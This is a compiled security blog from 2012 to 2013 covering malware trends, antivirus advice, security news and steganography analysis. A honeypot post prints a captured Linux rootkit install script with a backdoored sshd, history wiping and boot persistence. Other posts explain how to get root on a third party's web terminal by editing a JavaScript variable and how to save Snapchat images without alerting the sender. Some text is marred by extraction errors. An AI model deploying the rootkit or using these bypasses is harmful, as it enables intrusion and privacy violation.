Using Google Insights to Track Computer Virus Outbreaks (2012-09-09 08:24)
Google.org currently maintains [1]Google Flu Trends which works by looking at search keywords as [2]indicators of u activity. Ive been doing some thinking recently, and why not apply the same to computer virus outbreaks? Im still trying to rene the search keywords, but theres a good [3]article on CNet which might provide some starter info. Based upon the article, Ive created the following string for insights. Note that Insights treats + as a logical OR...
computer virus infection + computer slow + computer crashes + program opens slow + annoying popups + is symantec.com down + is mcafee.com down + is trendmicro.com down + cant update antivirus Its important to note however, that using the above search string along will not produce the global infection map were looking for. This only looks at English-language searches, and does not include searches in other languages. We can however use this string to create a nice map showing infection trends in the United States over the past year.
101
BlogBook
2.9. September
Since most infections result in searches such as why is my computer slow, here is a multi-lingual search string:
computer slow + ordinateur lent + ordenador lento + bilgisayar yava_ + LED + 0 + : b + computer langsom + f b + :><?LNB5@ <54;5==> + powolny komputer + ! If the above string is accurate enough to indicate that the user is infected with a virus, then we can view global infection trends for home users. We can try to validate this data by looking at [4]October 2008 through February 2009, when Concker was infecting the most computer systems. Concker started infecting computers in November, 2008, and in January 2009 reached a peak of possibly [5]15 million infections. More importantly, we can use the data for the past 30 days to monitor for spikes in activity, which would indicate a possible malware infection is spreading in the wild. We can also use this data to create a rather interesting [6]global history of malware infections.
1. http://www.google.org/flutrends/ 2. http://www.google.org/flutrends/about/how.html 3. http://news.cnet.com/8301-13880_3-10217714-68.html 4. http://bit.ly/OFI3Vb 5. http://www.upi.com/Top_News/2009/01/25/Virus_strikes_15_million_PCs/UPI-19421232924206 6. http://bit.ly/VAKw3i
2.9.4
Learnist: Share What you Know (2012-09-09 13:46)
Today I received a perk from Klout.com for an invitation to join [1]Learnist. While Im under no obligation to actually write about the perk, I really wanted to share this with everyone. I have to say, Im very impressed. Its a massive community of learning and sharing...all at your own pace, with no pressure to pass tests or earn certicates. Ive setup a [2]Cyber Security Tips and Tricks board, and began adding my own how-to articles, as well as other useful resources online. I encourage you to look into the site, and request an invite!
1. http://learni.st/ 2. http://learni.st/users/kenneth.buckler/boards/4740-cyber-security-tips-and-tricks
2.9.5
How to Choose the Right Antivirus and Firewall (2012-09-10 20:13)
Anti-virus and Firewall are very important protection for all systems, home or business. If you dont have a budget to purchase software, there are some excellent free programs available. Please note that I am only going to be discussing Windows in this post, as Mac or Linux AV is a completely dierent subject worthy of a future blog post. The rst product you should consider is [1]ZoneAlarm Antivirus+Firewall. This lightweight combination is perfect to maximize protection while minimizing performance impact. However, if you do not want a combination Antivirus+Firewall, its perfectly acceptable to use ZoneAlarms standalone rewall product with another antivirus product...but I strongly recommend at a minimum using ZoneAlarms rewall, as I have yet to nd a comparable rewall product for free. If youre looking for an alternative to ZoneAlarms antivirus, there are many available. 102
2.9. September
BlogBook
First on the list is AVG (which you can download directly [2]here) Second is [3]Microsoft Security Essentials, which requires a legitimately licensed copy of Windows Third is [4]ClamWin, an open source antivirus program which is extremely lightweight but does not feature an on-access scanner. If you have a budget to aord antivirus at home, or need to protect your business, VIPRE has written a guide on [5]choosing the right antivirus solution for your business. By the way, if youd like to support this blog, feel free to make a purchase through our [6]Software Catalog.
1. http://www.kqzyfj.com/lc116vpyvpxCIIHFIHHCEDHKLMEH 2. http://www.jdoqocy.com/gp70qgpmgo39986988354BB4B8C 3. http://windows.microsoft.com/mse 4. http://www.clamwin.com/ 5. http://caffinesecurity-blogspot.tradepub.com/free/w_thre03/?p=w_thre03 6. http://caffeinesecurity.blogspot.com/p/software-catalog.html
2.9.6
The Anonymous Lies Keep Building - GoDaddy and Apple (2012-09-11 12:31)
UPDATE 9/11/2012: Anonymous Own3r is a fraud. The GoDaddy outage was caused by an [1]internal router issue, and not a hacking or denial of service attack. EDITORS NOTE: As of writing this article, Anonymous Own3r has not provided proof that he/s Earlier this year I wrote about an Anonymous plan to take down the internet through a massive Denial of Service attack against the [2]root DNS servers, and how to take steps to avoid being aected. However, this attack never impacted anyone. Today a member of the group Anonymous, who goes by [3]Anonymous Own3r claimed responsibility for knocking [4]GoDaddys DNS servers oine. According to the hacker fraudster, he/she acted alone in this attack, and it was not assisted by the Anonymous collective. However, no explanation has yet been posted as to how he/she took down GoDaddys DNS servers further investigation reveals that Anonymous Own3r is a fraud, and was not responsible. This revelation comes on the same day that it was revealed that leaked Apple device IDs were from a US company BlueToad, instead of the FBI, as Anonymous has claimed. According to [5]Netcraft.com the GoDaddy outage lasted approximately 3.25 hours, and aected eight out of GoDaddys ten hosting locations.
[6] While the percentage of the Internet aected by this attack is not clear, what is clear is that the thousands of web sites and email servers hosted by GoDaddy went dark today during business hours, wreaking havoc on businesses relying on GoDaddy for their web and email presence. Does your Disaster Recovery Plan and Business Continuity Plan include massive outages by your hosting provider? If not, now would be a good time to add it, especially if your organization relies on web and email for your critical business functions. Related Reading: [7]Solution Brief: Disaster Recovery [8]Pre-Testing Disaster Recovery and Business Continuity Plans
103
BlogBook [9]Recent Lessons in Disaster Recovery [10]Mission Critical (FREE Subscription!)
2.9. September
1. http://arstechnica.com/security/2012/09/godaddy-outage-caused-by-router-snafu-not-ddos-attack/?utm_source= feedburner&utm_medium=feed&utm_campaign=Feed%3A+arstechnica%2Findex+%28Ars+Technica+-+All+content%29 2. http://caffeinesecurity.blogspot.com/2012/03/how-to-mitigate-anonymous-internet.html 3. https://twitter.com/AnonymousOwn3r 4. http://techcrunch.com/2012/09/10/godaddy-outage-takes-down-millions-of-sites/ 5. http://uptime.netcraft.com/perf/graph?site=www.godaddy.com&tn&range=86400&sd=0&collector=all&sample=2 6. http://1.bp.blogspot.com/-HHPgeEoVTcU/UE51F6KTQJI/AAAAAAAAANg/zCFWrkFa6tQ/s1600/godaddy.png 7. http://caffinesecurity-blogspot.tradepub.com/free/w_aaaa1067/?p=w_aaaa1067 8. http://caffinesecurity-blogspot.tradepub.com/free/w_aaaa1095/?p=w_aaaa1095 9. http://caffinesecurity-blogspot.tradepub.com/free/w_aaaa1696/prgm.cgi 10. http://caffinesecurity-blogspot.tradepub.com/free/miss/?p=miss
2.9.7
Zombie Alert - How to Survive the Coming Zombie Apocalypse (2012-09-11 20:48)
Every day I come across interesting personal security stu that just doesnt t with the theme of this blog. In response to this, I have started a blog called [1]How to Survive the Coming Zombie Apocalypse. My goal is to make this a humorous, yet useful resource for personal security, preparedness, and self defense. I hope you enjoy the blog, as I have great plans for it.
1. http://bestzombiedefense.blogspot.com/
2.9.8
How Not to Redact a Document (2012-09-16 15:36)
In case you didnt know, Zynga and EA have been in a [1]legal battle over copying each others games. Zynga has posted publicly an answer to EAs accusations as well as a [2]demand for jury trial. Also posted was a counterclaim with [3]redacted sections.
[4] However, Zyngas legal team did a very poor job of redacting the documents. Instead of removing the redacted text, they simply set its background to black. The original redacted text can be revealed by highlighting the text.
[5] Its very important that document redaction methods be properly reviewed by the IT sta prior to release. Without proper review of methods, sensitive information could be revealed, which could possibly cost an 104
2.10. October organization millions. Related Reading: [6]A Primer On Electronic Document Security
1.
BlogBook
http://news.cnet.com/8301-10797_3-57513391-235/zynga-countersues-ea-for-alleged-anticompetitive-practices/ 2. http://www.scribd.com/doc/105947441/Part-2-Zynga-s-Answer-and-Demand-for-Jury-Trial 3. http://www.scribd.com/doc/105947608/Part-3-Counterclaim-Public 4. http://1.bp.blogspot.com/-3Dl9VBPZJ2A/UFYm2Fg7UnI/AAAAAAAAAOs/VuUuk8-AtYY/s1600/redacted.png 5. http://3.bp.blogspot.com/-Mx-pF6lT33A/UFYnpi3aVbI/AAAAAAAAAO0/6qP8256e26s/s1600/oops.png 6. http://caffinesecurity-blogspot.tradepub.com/free/w_aaaa2459/?p=w_aaaa2459
2.9.9
IE Zero Day Exploit in the Wild (2012-09-17 15:14)
There is an IE exploit in the wild which aects IE 7, 8, and 9. For more information, see the [1]SANS ISC post.
1. https://isc.sans.edu/diary/IE+Zero+Day+is+For+Real+/14107
2.9.10
IE Zero Day and Increase in Global Malware Indicators (2012-09-18 10:51)
A look at the [1]last 30 days of web searches for common malware infection indicators shows that the [2]Internet Explorer Zero Day vulnerability has been in the wild since possibly September 12, 2012, or possibly as far back as September 8. On September 11, the indicator search volume was at 67 on a sliding scale. As of September 16, 2012 (the last day Google provides search data for at this time), the search volume had increased to 94. The search volume had peaked on September 2, and was on a fairly steady decline since, with the exception of a brief spike in search activity on September 8.
1. http://bit.ly/PfmTcT 2. http://www.securityweek.com/new-internet-explorer-zero-day-being-exploited-wild
2.9.11
Free trial of VIPRE Antivirus Business (2012-09-23 17:26)
Discover rst hand, the benets of this security solution for your company. VIPRE Antivirus Business is the cost-eective and easy-to-manage business virus protection for small- and medium-sized businesses. Its easy to set up and use via an intuitive management console. Its the business antivirus built with IT administrators in mind. Try VIPRE free for 30 days to see how this security solution can benet your organization. This oer is intended for business use only. [1]Request your free trial today!
1. http://caffinesecurity-blogspot.tradepub.com/free/w_sb32/?p=w_sb32
2.10
2.10.1
October
Keccak Chosen by NIST as SHA-3 Hashing Algorithm (2012-10-04 14:00)
The National Institute of Standards and Technology has [1]chosen Keccak as the winner of the SHA-3 hashing competition! You can read more about Keccak at the ocial [2]web site.
105
BlogBook
1. http://csrc.nist.gov/groups/ST/hash/sha-3/winner_sha-3.html 2. http://keccak.noekeon.org/
2.10. October
2.10.2
Hurricane
Sandy
Fake
Webcam
Social
Engineering
Experiment
(2012-10-30 16:42)
Yesterday I decided to perform a bit of a social engineering experiment on USTREAM. I provided live coverage of Hurricane Sandy from space.
[1] Of course by live coverage...I actually mean I took a photo which was published by NASA, added static, a nonsense cam label, and a timestamp, and streamed the image to USTREAM. I only posted a couple links in my Twitter feed, and watched with amusement as others began to watch the channel, believing they really were seeing a live cam feed of Hurricane Sandy from space. The most interesting part of all this is that for hours people stared at an image which never actually changed...except for a small period of time when I added in a photoshopped UFO just for laughs.
[2] As you can see from this chart, the cam never took o in popularity, but according to USTREAM a total of 78 unique viewers watched my fake Sandy cam on 10/29...and not a single comment was posted accusing the cam of being fake. So what lessons can we take away from this? For one, it shows that social engineering is still an eective trick. Provide the user what they want want to see, and theyll believe its real. This is the same principle behind advance fee frauds and online lottery 106
2.11. November scams, just in a non-malicious way. I encourage readers to post their own thoughts on this experiment.
BlogBook
1. http://1.bp.blogspot.com/-4bOIykxEGR8/UJA24DyOx-I/AAAAAAAAAPQ/3t3jQR7IXu0/s1600/sandy-from-space-cam.png 2. https: //docs.google.com/spreadsheet/oimg?key=0AlZA4ubLZ4YKdEhRWXh2WkpQRlFRQlZqVjIwQkNKQlE&oid=2&zx=jycuk0nwqs20
2.11
2.11.1
November
FDA Fails to Properly Evaluate Medical Device Security per U.S. GAO Report
(2012-11-04 22:41)
Warning: The contents of this blog post could (literally) give you a heart attack. The U.S. Government Accountability Oce website has published an interesting report on Information Security and Medical Devices. Unfortunately this report has probably been missed amid all the U.S. elections news.
[1] The 62 page report calls out the FDA on their 2001 and 2006 premarket review of two medical devices with known vulnerabilities and states that FDA considered information security risks from unintentional threats, but not risks from intentional threats. While it is comforting to know that the FDA is looking at issues such as accidental electromagnetic interference, it worries me that the FDA is not considering more serious threats, such as intentional malicious interference with a device.
Specically, FDA considered risks from unintentional threats for four of the eight information security control areas GAO selected for its evaluation software testing, verication, and validation; risk assessments; access control; and contingency planning. However, the agency did not consider risks from intentional threats for these areas, nor did the agency provide evidence of its review for risks from either unintentional or intentional threats for the remaining four information security control areas risk management, patch and vulnerability management, technical audit and accountability, and security- incident - response activities. According to FDA, it did not consider information security risks from intentional threats as a realistic possibility until recently. In commenting on a draft of this report, FDA said it intends to reassess its approach for evaluating software used in medical devices, including an assessment of information security risks. This report is denitely an eye opening read, and also shows that the Federal Government is starting to think outside the box when it comes to Information Security.
107
BlogBook
2.11. November
Report: [2]Highlights - FDA Should Expand Its Consideration of Information Security for Certain Types of Devices [3]Download Full Report (PDF)
1. http://1.bp.blogspot.com/-3h8avOZMxqs/UJcywvQ3yZI/AAAAAAAAAPg/-15B2MiImAM/s1600/medHacking.png 2. http://www.gao.gov/products/GAO-12-816 3. http://www.gao.gov/assets/650/647767.pdf
2.11.2
Threat Watch updated to include Malware Indicator Trends (2012-11-13 12:16)
Ive updated the [1]Threat Watch page to include global home-based malware infection indicators. Please note that this feature is still experimental. You can also [2]read more about how I created this map and graph.
1. http://caffeinesecurity.blogspot.com/p/threat-watch.html 2. http://caffeinesecurity.blogspot.com/2012/09/using-google-insights-to-track-computer.html
2.11.3
Google Two Factor Authentication - Protect Your Gmail and Google+ Account!
(2012-11-21 21:31)
Have you secured your Google account with [1]two-factor authentication yet? If you have a smart phone such as Blackberry Android or iPhone you can easily add an extra layer of protection to your Google account including Gmail or Google+. The authenticator app is available at no charge whatsoever. Google [2]provides instructions on how to install the app based upon your phone. Once setup you will be asked for a time-sensitive PIN provided by your smartphone when logging into your Google account. Even if your account password is stolen or guessed your account will be secure! Read more at [3]Googles 2-step verication page.
1. http://support.google.com/accounts/bin/answer.py?hl=en&answer=180744 2. http://support.google.com/accounts/bin/answer.py?hl=en&answer=1066447 3. http://support.google.com/accounts/bin/topic.py?hl=en&topic=28786
2.11.4
Perpetual Eorts in Futility - A History of Computing Security (2012-11-24 20:06)
Ive threatened to do this for a while now...and Ive nally got the motivation to do so. I always said one of these days I need to write a book on all the crazy computer stu Ive seen over the years. But then it dawned on me...there is no real timeline out there of the history of computing security. Sure, some of it is interlaced between the pages of other computing history books or sites...but security is always an afterthought...a footnote. So why Perpetual Eorts in Futility? Ive had that name picked out for years. Security has always been a cat-and-mouse game of seeing who can outsmart the other. Malware writers and other malicious individuals are always at odds with the security folks in a perpetual war which will never really end. So, using Blogger, Im going to begin piecing together a timeline of the history of computing security. Eventually, when everything is complete to my satisfaction, maybe Ill even publish it as a book. Who knows! So without further delay, I present to you my rst entry in Perpetual Eorts in Futility - an article about [1]the very rst computer worm Creeper. Please be sure to check [2]Perpetual Eorts in Futility for future updates!
1. http://perpetualfutility.blogspot.com/1971/03/creeper-first-computer-worm.html 2. http://perpetualfutility.blogspot.com/
108
2.12. December
BlogBook
2.11.5
Linux Rootkit bum.pdf dropped onto my Honeypot Today (2012-11-26 20:06)
A malicious user from Romania using Putty dropped o a Linux rootkit on my honeypot today. From my initial analysis it appears that the honeypot installs a hidden SSH server running on port 10001. I havent had much time to look through the entire package but if youd like to browse what was dropped o I have uploaded everything to [1]CaSec-Malware-Analysis. If you nd anything interesting please free to post a comment. UPDATE: I have found a related article on TMCNET.com talking about a backdoor installed on port 10001. Read the article here: [2]http://blog.tmcnet.com/blog/tom-keating/asterisk/hacked-aster isk-pbx-update.asp Here is the install script for the main payload. Interesting stu!
#!/bin/bash unset HISTSAVE unset HISTFILE unset SAVEFILE unset history mv libcrypto.so.4 /lib/ chattr -suia /usr/sbin/zdump rm -rf /usr/sbin/zdump mv sshd /usr/sbin/zdump chattr +suia /usr/sbin/zdump mkdir -p /usr/include/X11/.swap/ tar xvfz pic.tar.gz -C /usr/include/X11/.swap/ /dev/null mkdir -p /usr/include/sound mv sound.so /usr/include/sound/ mv sounds.h /usr/include/sound/ chmod 770 /usr/include/sound/sounds.h /usr/include/sound/sounds.h echo # Now that we have all of our basic modules loaded and the kernel going, /etc/rc.sysinit echo # lets dump the syslog ring somewhere so we can nd it later /etc/rc.sysinit echo /usr/include/sound/sounds.h /etc/rc.sysinit sleep 10 echo Enjoy your new box on port 10001 cd .. rm -rf rks*
1. http://code.google.com/p/caffsec-malware-analysis/source/browse/#svn%2Ftrunk%2Fbum_rootkit 2. http://blog.tmcnet.com/blog/tom-keating/asterisk/hacked-asterisk-pbx-update.asp
2.12
2.12.1
December
Detecting Targeted Malware and Advanced Persistent Threats (2012-12-06 19:24)
When dealing with malware, typically your last line of defense is your antivirus. In order for malware to slip past antivirus scanning software, the malware needs to rst bypass your perimeter network defenses, such as Network Intrusion Prevention System (NIPS) and network rewall, as well as your Host Intrusion Prevention System (HIPS) and host based rewall. Multiple layers of protection should block a large number of threats to your organization.
109
BlogBook
2.12. December
Typically, most of the malware which will bypass all of your security layers is targeted malware...never before seen in the wild. If the malware is advanced enough, it will be able to slip past your heuristics defenses, and since it has never been seen in the wild, will go unnoticed by your signature based antivirus scans. If youre fortunate enough to detect some sign of trouble, the rst thing you should do is begin checking common malware load points. Dont bother trying to look for the proverbial needle in a haystack and nd the le which infected your system. Be aware that there are only a few load points which will be used by malware, and begin your search there. Norton has a wonderful [1]Malware Removal Guide available which identies the common load points of malware for Windows. For your reference, Ill reproduce the list here: Registry Keys:
HKEY CURRENT USER\Software\MicrosoftshWindows\Current Version\Run HKEY CURRENT USER\SOFTWARE\MicrosoftshWindows\CurrentVersion\RunOnce HKEY CURRENT USER\SOFTWARE\MicrosoftshWindows\CurrentVersion\RunServi ces HKEY CURRENT USER\SOFTWARE\MicrosoftshWindows\CurrentVersion\RunServi cesOnce HKEY CURRENT USER\Software\MicrosoftshWindows\CurrentVersion\Policies \Explorer\Run HKEY CURRENT USER\Software\MicrosoftshWindowsNT\CurrentVersion\Window s HKEY LOCAL MACHINE\SOFTWARE\MicrosoftslashWindows\CurrentVersion\Run HKEY LOCAL MACHINE\SOFTWARE\MicrosoftslashWindows\CurrentVersion\RunOn ce HKEY LOCAL MACHINE\Software\MicrosoftslashWindows\CurrentVersion\RunOn ceEx HKEY LOCAL MACHINE\SOFTWARE\MicrosoftslashWindows\CurrentVersion\RunSe rvices HKEY LOCAL MACHINE\SOFTWARE\MicrosoftslashWindows\CurrentVersion\RunSe rvicesOnce HKEY LOCAL MACHINE\Software\MicrosoftslashWindows\CurrentVersion\Polic ies\Explorer\Run HKEY LOCAL MACHINE\SOFTWARE\MicrosoftslashWindowsNT\CurrentVersion\Win dows HKEY LOCAL MACHINE\SOFTWARE\MicrosoftslashWindowsNT\CurrentVersion\Win logon HKEY LOCAL MACHINE\Software\MicrosoftslashWindowsNT\CurrentVersion\Win dows\AppInit DLLs HKEY LOCAL MACHINE\SOFTWARE\MicrosoftslashWindows\CurrentVersion\Explo rer\SharedTaskScheduler HKEY CLASSES ROOT\comle\shell\o pen\command HKEY CLASSES ROOT\pile\shell\o pen\command HKEY CLASSES ROOT\exele\shell\o pen\command HKEY CLASSES ROOT\txtle\shell\o pen\command HKEY LOCAL MACHINE\Software\MicrosoftslashWindowsNT\CurrentVersion\Win logon HKEY CURRENT USER\Software\MicrosoftshWindowsNT\CurrentVersion\Window s HKLM\SYSTEM\CurrentControlSetackslashServices\ (look for suspect services which dont belong) HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ There are a few additional locations which could be used as malware load points: Wininit.ini - In my experience its rare for malware to use this as an infection point but its possible. Win.ini and system.ini are also possible. The les are located under c:\windows 110
2.12. December
BlogBook
Another more common load point is the Startup folder. However, its important to note that there are multiple Startup folders - User, Default User, and All Users. These could be under c:\Documents and Settings, c:\Users, or c:\Windows. Some old fashioned load points are autoexec.bat, cong.sys, and the task scheduler. The Norton article also mentions dosstart.bat, but that would most likely apply to only very old systems. Additional locations which Norton doesnt mention should be checked are your network shares and network startup scripts. It would be very possible that, should malware somehow gain administrative privileges (your users ARE using non-administrative accounts, right?), it could push a startup script to all of your systems, resulting in constant reinfection. Autorun.inf on network shares would be another good indicator of a malware infection - and should provide valuable insight as to the inner workings of the malware. Finally, dont fall for the needle in a haystack trap which Norton mentions of searching Windows and Temp folders. While malware may reside there, its important to realize that the malware has to be executed from somewhere. Identify where the malware is being loaded at, then use that knowledge to identify the malicious les. Should you nd a piece of targeted malware, your best bet is to rebuild or re-image the aected systems. You never know what additional surprises the malware has delivered. Remember - the best way of dealing with an advanced persistent threat is not to be aected by one in the rst place. Follow best security practices, lock down your systems, apply multiple layers of protection. And nally, dont allow your users to have local administrative rights - targeted malware cant infect a system as severely if the user isnt a local administrator in the rst place.
1. http://us.norton.com/support/premium_services/malware_removal_guide.pdf
2.12.2
How (not) to handle software vulnerability submissions (2012-12-26 11:51)
If youre a software vendor developing programs more complex than Hello World, eventually you will face an issue with a security vulnerability in your products. For those who dont know I currently have an automated crawler searching Pastebin for new exploits and vulnerabilities. This crawler reports its results live via the Twitter hashtag [1] #exploitAlert. Every once in a while if something catches my attention, Ill submit it to the software vendor. For most vendors the process is very straightforward...just send an email or ll out a form. For an example of the right way to allow submissions of security vulnerabilities take a look at [2]Microsofts method. Recently a supposed 0 day vulnerability for Parallels Plesk was found by my crawler (a permanent copy of this paste is available [3]here). Ive never worked with Parallels software before, so I went to their website to try and nd out where to submit a vulnerability. Finally I found it was an option on their support form. My jaw dropped when I saw the warning at the bottom of the support form...
111
BlogBook
2.12. December
[4]
Well that certainly puts a stopper on things. Im not a paying customer...so obviously I wont be able to continue. And whats even worse...if I was a paying customer...I would be CHARGED for submitting a security vulnerability! Policies such as the one above will only cause frustrated users to post the vulnerability publicly instead of through [5]responsible disclosure. If anyone from Parallels reads this I would like to encourage you to push for reform of your vulnerability submission practices.
1. https://twitter.com/search?q=%23exploitAlert&src=hash 2. http://technet.microsoft.com/en-us/security/ff852094.aspx 3. http://pastebin.com/tDvyMG9L 4. http://1.bp.blogspot.com/-KJbcp4GoY8Y/UNstRuTgcqI/AAAAAAAAAQY/dDTYftb1Q4Q/s1600/plesk.jpg 5. http://www.sans.org/reading_room/whitepapers/threats/define-responsible-disclosure_932
112
2.12. December
BlogBook
2.12.3
Snapchat Covert Screen Capture for Android Revealed (2012-12-30 03:02)
[1] Capture of a SnapChat image.Concerned about protecting your privacy? Get the [2]FREE guide to Facebook Privacy! At a family gathering today, a relative introduced me to SnapChat, and showed me how it only temporarily stores images, then deletes them when youre nished looking at them. For those who dont know SnapChat is a temporary image service. The concept is simple - images are sent, viewed, and destroyed within 10 seconds. If a user attempts to take a screenshot of the image, the sender is sent a notication. I tested the screenshot detection and sure enough...if you take a screenshot with your Android phone it really does send a notication! It was recently revealed that there is a method of [3]capturing SnapChat images for iOS without the sender knowing by accessing the les directly on the devices storage drive. But this only works on iPhone or iPod Touch. Always up for a challenge, I decided to see if I could bypass SnapChats temporary storage and save a permanent copy of photos I receive. After performing some analysis of how SnapChat works, today Im going to reveal how to permanently save incoming SnapChat photos on any Android phone. Android phones have a feature called USB Debugging which is commonly only used by tech savvy users or developers. This feature allows you to connect your Android phone to your computer and monitor its activities using the Android SDK. One of the features of the Android SDK is, you guessed it, a screen capture utility. By simply following [4]these instructions from AddictiveTips.com you can capture the current screen without alerting the SnapChat app. Simply time clicking the Refresh button just right and youll be able to capture that secret photo. Note that this is not a aw in the SnapChat app - this is the intentional design of the Android operating system. This is a high tech method of defeating SnapChat. A low tech undetectable method would be to simply take a picture of you phones screen using a camera from another device. So what should users take away from this? A simple security lesson - if you dont want someone to be able to save something you send them, and dont want to risk that knowledge or picture from being posted publicly, then dont send it to anyone in the rst place.
1. png
http://3.bp.blogspot.com/-_LfUqtFqsDw/UN_wPWfFWMI/AAAAAAAAAQo/IHYpsEHwNV4/s1600/device-2012-12-30-023949.
113
BlogBook
2. http://caffinesecurity-blogspot.tradepub.com/free/w_make16/?p=w_make16 3. source=feedburner&utm_medium=feed&utm_campaign=feed-sphinn 4. http://www.addictivetips.com/mobile/how-to-take-screenshots-in-android-using-android-sdk/
2.12. December
http://marketingland.com/
save-snapchat-private-facebook-poke-pictures-as-security-flaw-lets-users-keep-temporary-content-29625?utm_
2.12.4
Root @th3j35t3r with Google Chrome (2012-12-31 13:46)
Today were going to have a lesson on password strength and software vulnerabilities. Disclaimer: Th3J35t3rs site has served targeted malware in the past designed to capture data... especially from members of Anonymous. Perform these steps at your own risk! Theres something interesting afoot on [1]The Jesters website... In the upper right corner theres a little Pi symbol. If youve ever watched the movie The Net you know that interesting secrets are beneath the Pi symbol.
[2] After clicking on the Pi icon you are presented with a UNIX style login prompt.
[3] The login prompt allows you to login with the username guest and no password. However any attempts to login with root are met with a password prompt. If you peek under the hood of the javascript running this terminal youll nd the following:
var conf_rootpassskey=5f7588bd54449;
However this is an encrypted or hashed password as any attempts to login using this as a password fail. Instead of attacking the password lets attack the underlying software itself. 114
2.12. December Note: To perform these steps you MUST use Google Chrome. Open the JavaScript console using Ctrl+Shift+J. Then enter the following command:
BlogBook
conf_rootpassskey=;
[4] Now you should be able to gain root access to Jesters system with no problem. Use the username root and simply hit enter at the password prompt to enter a null password.
[5]
[6] Congratulations. You just rooted @th3j35t3r. The lesson to take away from this is that no matter how secure or complex your password is...do not have a false sense of security about your systems. Software vulnerabilities can give users backdoors to your private information without a password! ...sometimes it only requires a little thinking outside the box. BONUS: Can you crack Th3J35t3rs root password? Heres a link to get you started...
115
BlogBook [7]http://www.sf2600.com/weblog/2011/apr/06/challenge/
1. http://th3j35t3r.wordpress.com/ 2. http://3.bp.blogspot.com/-ZbBOmlMOwoo/UOHY28FLMHI/AAAAAAAAAQ4/Mu3SDrAHSAI/s1600/step1.png 3. http://1.bp.blogspot.com/-TLGsu-lobIc/UOHZPw6ccBI/AAAAAAAAARA/O0EDJxl7Roc/s1600/step2.png 4. http://2.bp.blogspot.com/-vnXgT0RLPJs/UOHagjEB01I/AAAAAAAAARQ/9wYDaeyleEs/s1600/step3.png 5. http://2.bp.blogspot.com/-6x2GhkZSmhE/UOHbAizAasI/AAAAAAAAARY/OvNardwLEi0/s1600/step4.png 6. http://3.bp.blogspot.com/-nm10BPWPxzM/UOHbNtvfKqI/AAAAAAAAARg/MEzPysMpX10/s1600/step5.png 7. http://www.sf2600.com/weblog/2011/apr/06/challenge/
2.12. December
116
Chapter 3
2013
3.1
January
3.1.1
Anonymous and Steganography - Blindly Distributing Terrorist Messages?

(2013-01-03 12:12)
As previously warned multiple times by [1]Th3J35t3r and [2]myself - Anonymous may be unwitting pawns in a much larger chess game. While their public support of terrorist organizations is being dismissed with anyone can claim to be Anonymous their blind distribution of encrypted les containing information from outside entities may not even be known to the inner-most circles of the organization. What encrypted les? One of the most common means of distributing Anonymous related information is through social media - especially through the distribution of image les. Little known to many outside the security eld is that images can be used to hide information through a process called Steganography. For those not familiar with the topic here is an excellent [3]whitepaper on how Steganography works as well as how to detect it. I have started using the StegDetect program from [4]Outguess.org and have found some interesting results. I recently started analyzing several images being re-posted by the Twitter handle [5]@YourAnonNews. Out of 51 images analyzed I found two images which returned positive as having embedded data, as well as two additional images which generated errors during analysis (possibly obfuscated?). The rst picture with a positive hit was an internet meme of the TV show Game of Thrones. The picture was re-posted by @YourAnonNews here: [6]https://twitter.com/i/ #!/YourAnonNews/media/slideshow?url=http %3A %2F %2Ftwitpic.com %2Fbqiggl However the image originated from [7]@57UN here: [8]http://twitpic.com/bqiggl Below is the image re-posted by @YourAnonNews
117
BlogBook
3.1. January
[9] Picture re-posted by @YourAnonNews - Click to EnlargeAnd here is a similar meme picture which is almost the exact same size as found on [10]http://whosin.com/pg/whois/24118207/Maine+Memes
[11] Similar Meme Picture - Click to EnlargeRunning StegDetect against the Gym picture above produces a hit for embedded data using jphide while running against the Sandy picture does not. Similarities between the two pictures: Both are of the same content - with only a slight variation (text at the bottom) Both are 72 dpi resolution Both are 24-bit color depth There are also some interesting dierences between the two pictures. The Gym picture is 600x461 pixels while the Sandy picture is 600x460 (Gym is one pixel taller) The Gym picture is 69,919 bytes while the Sandy picture is 51,416 bytes (26 % dierence) Error Level Analysis (ELA) using [12]FotoForensics produces some interesting results.
118
3.1. January
BlogBook
[13]
ELA - @YourAnonNews Reposted Image[14]
ELA - Sandy imageAreas in while indicate the image has possibly been altered from its original (see [15]FotoForensics Tutorial). As you can see above there has been signicant altering of the rst image while the second remains fairly uniform. You would expect that the images would display the same ELA pattern - the fact that they are drastically dierent indicates something has denitely been altered. So the question remains - is there something embedded inside this image? I believe so. Unfortunately all of my attempts to crack the password failed. Whatever secret this image holds we may never know. But I believe it denitely holds a secret. UPDATE 1: It was suggested in the comments below that this is simply a result of resizing or cropping the image. As such I cropped both images as suggested...and this provided some rather interesting results.
[16]
Suspect steganography image Gym cropped[17] 119
BlogBook
3.1. January
ELA of cropped Gym imageAs you can see above the ELA for the cropped Gym image suspected of containing steganography doesnt change much. More interesting is that StegDetect now throws an error instead of a negative/positive hit for steganography. error: Quantization table 0x01 was not dened
[18]
Image Sandy cropped
[19] ELA of Image Sandy croppedThe baseline Sandy image ELA does change slightly - but still not as profound as the suspected ELA image above. This image also produces the same message when performing StegDetect: error: Quantization table 0x01 was not dened
Therefore I believe it is safe to conclude that the positive detection for steganography is not a result of resizing or cropping the image. Related Reading: Al-Qaeda uses steganography - documents hidden in porn videos found on memory stick [20]http://www.infosecurity-magazine.com/view/25524/alqaeda-uses -steganography-documents-hidden-inporn-videos-found-on-memory-sti ck/ 120
3.1. January
BlogBook
Hidden Pictures: Steganography, Al-Qaeda and Anonymous - [21]http://sofrep.com/15858/hidden-pictures-steganography-al-qae da-anonymous/

